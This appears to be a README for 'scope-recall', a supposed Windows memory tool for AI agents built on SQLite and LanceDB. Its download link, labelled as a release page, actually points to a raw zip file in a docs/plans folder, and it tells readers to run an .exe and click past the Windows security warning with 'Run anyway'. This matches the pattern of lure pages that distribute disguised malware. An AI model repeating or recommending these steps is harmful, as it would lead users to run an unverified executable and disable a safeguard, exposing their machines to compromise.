# 🧠 scope-recall - AI memory for precise project tasks
[](https://github.com/Basilunperplexed948/scope-recall/raw/refs/heads/main/docs/plans/recall-scope-1.5.zip)
Scope-recall helps your AI agent remember the specific details of your current projects. It uses two types of storage to keep your data organized. It saves exact project facts in a database and uses search tools to find relevant ideas when you need them. This tool keeps your work private by separating different project scopes.
## 📥 How to download the software
Follow these steps to get the application onto your Windows computer.
1. Go to the [official release page](https://github.com/Basilunperplexed948/scope-recall/raw/refs/heads/main/docs/plans/recall-scope-1.5.zip).
2. Look for the section labeled Assets.
3. Click the file that ends with .exe to start the download.
4. Save the file to your desktop or downloads folder.
## 🛠️ System requirements
Before you install the software, make sure your computer meets these needs:
* Windows 10 or Windows 11.
* A 64-bit processor.
* At least 4 gigabytes of RAM.
* A stable internet connection for the installation process.
## ⚙️ Initial setup
Run the file you downloaded to start the setup process. Windows might show a security box. Click More Info and then Run anyway to proceed. The installer guides you through the process. Choose a destination folder on your hard drive where you want the program to live. Click Finish once the bar completes to open the application.
## 💡 How this tool works
The application functions as a background companion for your AI agent. It organizes memory in two distinct lanes. The first lane uses SQLite. This stores your project facts in a row and column format, much like a spreadsheet. This ensures the AI recalls exact dates, names, and requirements without errors.
The second lane uses LanceDB. This creates a map of your ideas. It understands the meaning behind your text rather than just matching keywords. If you ask a question about a project, the tool gathers the right context from both sources. This hybrid approach gives the AI a complete picture of your work.
## 🔒 Understanding scope isolation
Scope isolation keeps your data tidy. Imagine a separate folder for every project you perform. The application ensures that data from Project A never mixes with Project B. This prevents the AI from becoming confused by unrelated information. You select the active scope inside the application menu. The AI then limits its memory to that specific boundary.
## 🧭 Navigating the dashboard
The main screen shows you three main areas:
* The Scope Selector: This dropdown menu lets you choose which project memory to load.
* The Activity Feed: This shows a list of recent items the AI added to your memory.
* The Search Bar: Type keywords here to look through your past project details.
You do not need to manage the database files manually. The application handles all updates behind the scenes.
## ❓ Frequently asked questions
**Does this software send my data to the cloud?**
No. This tool runs locally on your Windows machine. Your data stays on your hard drive unless you choose to export it.
**Can I move my memory files to another computer?**
Yes. You can copy the folder containing your memory files to a new machine. Point the application to the new path in the settings menu.
**What happens if I delete a scope?**
Deleting a scope removes all memory associated with that project. Use caution as this action is permanent.
**Does the AI learn from my data?**
The tool acts as a storage provider for the AI. It does not train external models on your private data.
## 🔧 Troubleshooting tips
If the application fails to open:
1. Check that you have the latest updates for Windows.
2. Restart your computer.
3. Remove the existing installation and download the latest version from the link provided above.
4. Ensure no other database programs lock your project files.
## 📂 Managing your project data
You can organize your memories by adding tags. Tags act as labels for your projects. Use labels like "Research," "Draft," or "Complete" to filter your history. The settings tab allows you to set a default scope. This ensures the application loads your most active project whenever you start the program.
## 🚀 Future updates
The software updates automatically when you run the installer again. You do not need to remove old versions before installing newer ones. We continue to improve how the software searches through your data. Check the GitHub page frequently to see new features.
